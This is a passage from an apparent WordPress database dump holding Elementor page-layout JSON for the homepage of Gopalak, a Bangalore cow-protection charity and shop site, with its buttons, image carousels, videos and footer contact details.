560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46484d1\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"28e175b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ba2145a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12121,1992,'_elementor_page_assets','a:0:{}'),(12124,1993,'_elementor_edit_mode','builder'),(12125,1993,'_elementor_template_type','wp-page'),(12126,1993,'_elementor_version','3.7.8'),(12127,1993,'_wp_page_template','elementor_canvas'),(12128,1993,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by 